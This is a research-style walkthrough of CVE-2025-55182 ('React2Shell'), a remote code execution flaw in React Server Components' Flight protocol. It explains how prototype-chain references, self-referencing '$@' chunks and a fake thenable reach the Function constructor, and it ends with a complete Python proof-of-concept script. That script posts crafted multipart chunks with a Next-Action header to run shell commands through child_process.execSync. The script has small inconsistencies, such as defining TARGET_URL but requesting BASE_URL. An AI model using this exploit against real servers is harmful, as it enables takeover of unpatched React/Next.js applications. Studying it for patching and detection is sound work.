26/01/26

React2Shell | CVE-2025-55182

Security Research: React Server-Side Rendering Vulnerability

بِسْمِ اللَّهِ الرَّحْمَنِ الرَّحِيمِ

(Important) One of the methods to create a function in JS is function constructor

create_function.js

var func1 = Function()
var func2 = Function(”<function-code>”)
var func3 = Function(”<param>” , “<code>”)

Note: These functions considered as anonymous functions so save it in a variable and call it

The prototype represent the shape of the object (properties, functions, parameters …etc.)

we can use __proto__ to call a specific functions inside this shape

call_apply.js

var obj = {}
obj.__proto__.toString() 
alert.__proto__.toString()

We can call the constructor

call_apply.js

alert.__proto__.constructor // ==> Function() which is a function constructor

We can get the Function constructor but from object (Obj → Prototype → Function → Construstor)

alert1.js

var x = {}
var func7 = x.__proto__.toString.constructor("alert()")

the constructor also considered as function

alert2.js

var x = {}
var func7 = x.__proto__.constructor.constructor("alert()")

First suspection part: Flight Protocol which make the data represented as chunks

And we can reference data from another chunk using the '$' sign

alert2.js

files = {
    "0": (None, '["$1"]'),  // $1 -> means get the data in the chunck 1
    "1": (None, '{"object":"fruit","name":"$2:fruitName"}'), // Go to chunck 2 and get the property fruitName from it
    "2": (None, '{"fruitName":"cherry"}'),
}

OUTPUT

{ object: 'fruit', name: 'cherry' }

The problem is there’s no check on the referencing of this chunks, which means we can refer to anything we want (That’s the problem!)

So, we can create a function constructor inside the chunks by calling any function's constructor inside the prototype

function_constructor2.js

files = {
    "0": (None, '{"then":"$1:__proto__:constructor:constructor"}'),
    "1": (None, '{"x":1}'),
}

Which means:

function_constructor2.js

files= {
	"0": (None, '{"then":"{"x":1}:__proto__:constructor:constructor"}'),
}

Which means:

function_constructor2.js

{"x":1}.__proto__.constructor.constructor

OUTPUT: Which means:

OUTPUT

[Function: Function]

Now, we need to:

Call this function
Inject a code inside it

We've noticed in a file called action-handler.ts that the chunks are taken with await keyword and return the value without any checks, so to use this, we will create the function as a Thenable function

To Create it as thenable function we need to access the then property of the function constructor or access it from the prototype directly.

thenable.js

files = {
    "0": (None, '{"then":"$1:__proto__:then"}'),
    "1": (None, '{"x":1}'),
}

But if we go more inside, we will notice in the following code snippet we need to thenable to the whole chunk object not just its data

So, we will use another shape of referring, we will '$@' sign to refer to the chunk object itself, not just its data

thenable.js

files = {
	"0" : (None, "{'then':'$1:__proto__:then'}"),
	"1" : (None, "$@0")
}

which means:

thenable.js

Chunk.__proto__.then = function(resolve, reject) {
	// Code Injection Vuln.
}

To get inside the interesting function that we hightlighted in the previous screen shot we should make status value be "resolved_model"

thenable.js

files = {
	"0" : (None, "{'then':'$1:__proto__:then', 'status':'resolved_model'}"),
	"1" : (None, "$@0")
}

thenable.js

Chunk.__proto__.then = function(resolve, reject, 'status' == 'resolved_model') {
	// Code Injection Vuln.
}

Now, we created the function and make it called, and we are inside the vulnerable function `initializeModelChunk` that we want to exploit.

All we need now is to override this function to inject our payload that will leads to RCE

initializeModelChunk.js

function initializeModelChunk(chunk) {
    // ...
    var rawModel = JSON.parse(resolvedModel),
        value = reviveModel(chunk._response, { "": rawModel }, "", rawModel, rootReference);
    // ...
}

So, the vulnerable function take a property from 'chunk' called _response and pass it modelRevive function

reviveModel.js

case "B":
  return (
    (obj = parseInt(value.slice(2), 16)),
    response._formData.get(response._prefix + obj)
  );

Inside the function, there's a get function that we will override and take a _perfix proprty from the _response object and case 'B'

So, The Complete Payload steps

Referr to the chunk object itself using '$@'
Create a function constructor inside the chunk
Make it thenable to be called and set status as "resolved_model"
Edit the _response object to inject our payload
Override the get function to make function constructor which will take the _perfix property from us
Make the _perfix property a System command code

RCE.js

crafted_chunk = {
    "then": "$1:__proto__:then",
    "status": "resolved_model",
    "reason": -1,
    "value": '{"then": "$B0"}',
    "_response": {
        "_prefix": f"process.mainModule.require('child_process').execSync('calc');",
        "_formData": {
            "get": "$1:constructor:constructor",
        },
    },
}

files = {
    "0": (None, json.dumps(crafted_chunk)),
    "1": (None, '"$@0"'),
}

You can use the following python script as a PoC:

React2Shell.py

import requests
import sys
import json

TARGET_URL = "http://localhost:3000"
COMMAND =  "id"

crafted_chunk = {
    "then": "$1:__proto__:then",
    "status": "resolved_model",
    "reason": -1,
    "value": '{"then": "$B0"}',
    "_response": {
        "_prefix": f"var res = process.mainModule.require('child_process').execSync('{COMMAND}',{{'timeout':5000}}).toString().trim(); throw Object.assign(new Error('NEXT_REDIRECT'), {{digest:${res}}});",
        "_formData": {
            "get": "$1:constructor:constructor",
        },
    },
}

files = {
    "0": (None, json.dumps(crafted_chunk)),
    "1": (None, '"$@0"'),
}

headers = {"Next-Action": "x"}
res = requests.post(BASE_URL, files=files, headers=headers, timeout=10)
print(res.status_code)
print(res.text)